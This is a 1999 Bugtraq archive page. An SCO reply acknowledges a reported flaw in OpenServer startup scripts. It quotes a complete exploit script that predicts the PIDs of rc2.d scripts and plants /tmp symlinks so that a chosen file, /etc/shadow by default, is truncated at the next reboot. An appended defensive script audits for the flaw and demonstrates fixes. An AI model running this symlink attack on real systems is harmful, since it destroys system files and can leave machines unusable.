Bugtraq mailing list archives

Re: Little exploit for startup scripts (SCO 5.0.4p).


From: jonco () SCO com (Jon Coyle)
Date: Mon, 8 Mar 1999 11:58:54 -0000


Leshka,

We have started work on this and are checking all of our OS
products to see if they suffer from similar problems. We will
make information available at our security pages (http://www.sco.com/security)
on how to work around the problem, and will also have fixes
available in a few days.

Thanks,

Jon

-----Original Message-----
From: Bugtraq List [mailto:BUGTRAQ () netspace org]On Behalf Of leshka
Sent: 07 March 1999 12:07
To: BUGTRAQ () netspace org
Subject: Little exploit for startup scripts (SCO 5.0.4p).


#!/bin/sh
#
#                                   ... The punishment for inobedience ...
#                                                   (Cycle # 2)
#
#                This simple script can help to erase any file
#                 (SCO OpenServer Enterprise System v 5.0.4p).
#                                 Have fun !
#
#
#
#
# Some of "/etc/rc2.d" startup scripts create and then delete temporary files
# with  easily  predictable  names in "/tmp" directory.  Below there are a few
# interesting fragments of those nice scripts:
#
# S84rpcinit:
# ...
#       /bin/su root -c "/bin/ps -ef" > /tmp/rpc$$ 2>/tmp/rpc.err$$
#       /bin/rm -f /tmp/rpc.err$$
# ...
#       rm -rf /tmp/rpc$$
#
# S95nis:
# ...
#       /bin/su root -c "/bin/ps -ef" > /tmp/nis$$ 2>/tmp/nis.err$$
#       /bin/rm -f /tmp/nis.err$$
# ...
#       rm -f /tmp/nis$$
#
# S85tcp:
# ...
#       /bin/su root -c "/bin/ps -ef" > /tmp/tps$$ 2>/tmp/ps.err$$
#       /bin/rm -f /tmp/ps.err$$
# ...
#       /bin/rm -f /tmp/tps$$
#
# S89nfs:
# ...
#       /bin/su root -c "/bin/ps -ef" > /tmp/nfs$$ 2>/tmp/nfs.err$$
#       /bin/rm -f /tmp/nfs.err$$
# ...
#       rm -f /tmp/nfs$$
#
# Every time during the startup  such shell scripts create  files with names
# that include a process number of the above shell script. My numerous tests
# showed that the number is always the same with every reboot.  Pretty good,
# isn't it? One problem: how to determine the process number of such script?
# It's  so simple!  Child processes  of this script  have PID's  with values
# slightly above the parent's PID.  A little math and one gets it. The next
# step is  creating  a few symbolic links  to the victim file  in the "/tmp"
# directory. During the next startup the victim file will be destroyed.
#
# P.S.  Looking forward  to getting published a complete SCO's list of names
# of such perfect shell scripts.
#
#                                   999,99*2
#
#                            ----------------------
#                ---------------------------------------------
#     -----------------   Dedicated to my beautiful lady   ------------------
#                ---------------------------------------------
#                            ----------------------
#
#       Leshka Zakharoff, 1999. E-mail: leshka () leshka chuvashia su (.ru)
#
#
#
# Ask for the target file if none was given on the command line.
if [ _$1 = "_" ]
then
    {
     echo -n "File to delete [/etc/shadow]:"
     read victim_file
     if [ _$victim_file = "_" ]
        then
            victim_file="/etc/shadow"
        fi
    }
else
    victim_file=$1
fi
# inetd is started from the rc2.d scripts, so its PID lies a little above
# the PID the startup script had, and the same PIDs come back every reboot.
pid=`/bin/ps -ef|/bin/grep -v awk|/usr/bin/awk '/inetd/ { printf  $2 }'`
lastpid=`expr $pid - 30`
# Plant a symlink named like S85tcp's "/tmp/tps$$" for each candidate PID
# below inetd's; at the next boot the redirection truncates the target
# instead of creating a fresh file. (The link now points at the chosen
# $victim_file rather than a hard-coded /etc/shadow.)
while [ $pid != $lastpid ]
      do
        pid=`expr $pid - 1`;ln -fs "$victim_file" /tmp/tps$pid
      done
echo Done ! File \"$victim_file\" will be destroyed after the next reboot.

----
Jon Coyle - Manager, Internet Engineering & Secure Technologies
jonco () sco com                                                         SCO Ltd.
Tel: +44 1923 813656                                  Croxley Business Park
Fax: +44 1923 813804                                              Hatters Lane
http://www.sco.com                                     Watford, WD1 8YN, UK
Fingerprint: F44A 677A 4920 02AC C655  D419 B9B7 46B0 A951 6FF7
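As an added example (not code from leshka's post, from SCO, or from the S85tcp script it quotes): a POSIX sh script that audits an rc directory for the "/tmp/name$$" pattern shown in the fragments above, reproduces the clobber in a throwaway directory that stands in for /tmp, and shows the two fixes a script author has: noclobber, which turns the overwrite into a failed redirection, and a private mktemp -d directory, which removes the attacker's ability to pre-seed the path at all. The sample rc scripts are constructed for the example; it assumes a modern sh (bash or dash) with mktemp(1), grep(1) and wc(1).

```shell
#!/bin/sh
# Added example, not code from leshka's post or from SCO. Assumes a modern
# POSIX sh (bash or dash) with mktemp(1), grep(1) and wc(1) available.

# Constructed miniature rc directory: one script carrying the S85tcp
# pattern quoted in the post and one that already uses mktemp.
# Prints the directory's path.
make_sample_rc() {
    dir=$(mktemp -d) || return 1
    cat > "$dir/S85tcp" <<'EOF'
#!/bin/sh
/bin/su root -c "/bin/ps -ef" > /tmp/tps$$ 2>/tmp/ps.err$$
/bin/rm -f /tmp/ps.err$$
/bin/rm -f /tmp/tps$$
EOF
    cat > "$dir/S99safe" <<'EOF'
#!/bin/sh
t=$(mktemp) || exit 1
/bin/ps -ef > "$t"
rm -f "$t"
EOF
    printf '%s\n' "$dir"
}

# Audit: print "script:line:text" for every redirection into /tmp whose
# name ends in the script's own PID ($$), i.e. the quoted pattern.
find_predictable_tmp() {
    grep -n '>[[:space:]]*/tmp/[A-Za-z0-9_.]*\$\$' "$1"/* 2>/dev/null
}

count_predictable_tmp() {
    find_predictable_tmp "$1" | wc -l | tr -d ' '
}

# The mechanism: a plain ">" follows a symlink planted in advance and
# truncates whatever it points at. $1 stands in for /tmp so nothing
# outside the sample directory is touched. Returns 0 if clobbered.
clobber_via_symlink() {
    victim="$1/victim"
    printf 'secret\n' > "$victim"
    ln -s "$victim" "$1/tps42"
    echo overwritten > "$1/tps42"
    [ "$(cat "$victim")" = overwritten ]
}

# Mitigation 1: noclobber (set -C) turns ">" into O_CREAT|O_EXCL, so the
# redirection fails rather than following the link. The attacker can
# still make the boot step fail, but cannot truncate the target.
noclobber_refuses_symlink() {
    victim="$1/victim2"
    printf 'secret\n' > "$victim"
    ln -s "$victim" "$1/nis42"
    ( set -C; echo overwritten > "$1/nis42" ) 2>/dev/null && return 1
    [ "$(cat "$victim")" = secret ]
}

# Mitigation 2 (preferred): capture a command's output in a private
# directory from mktemp -d (mode 0700, unguessable name), so no other
# user can pre-seed the path. Prints the path of the captured output.
safe_capture() {
    d=$(mktemp -d) || return 1
    out="$d/out"
    err="$d/err"
    if [ -e "$out" ] || [ -L "$out" ]; then
        rm -rf "$d"
        return 1
    fi
    "$@" > "$out" 2> "$err" || { rm -rf "$d"; return 1; }
    printf '%s\n' "$out"
}
```

Run find_predictable_tmp against a real rc directory (for example /etc/rc2.d) to get the list of affected scripts the post asks SCO for; safe_capture is the shape the quoted "su root -c ps -ef > /tmp/xxx$$" lines should take, with the caller removing the returned file's directory when it is done.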


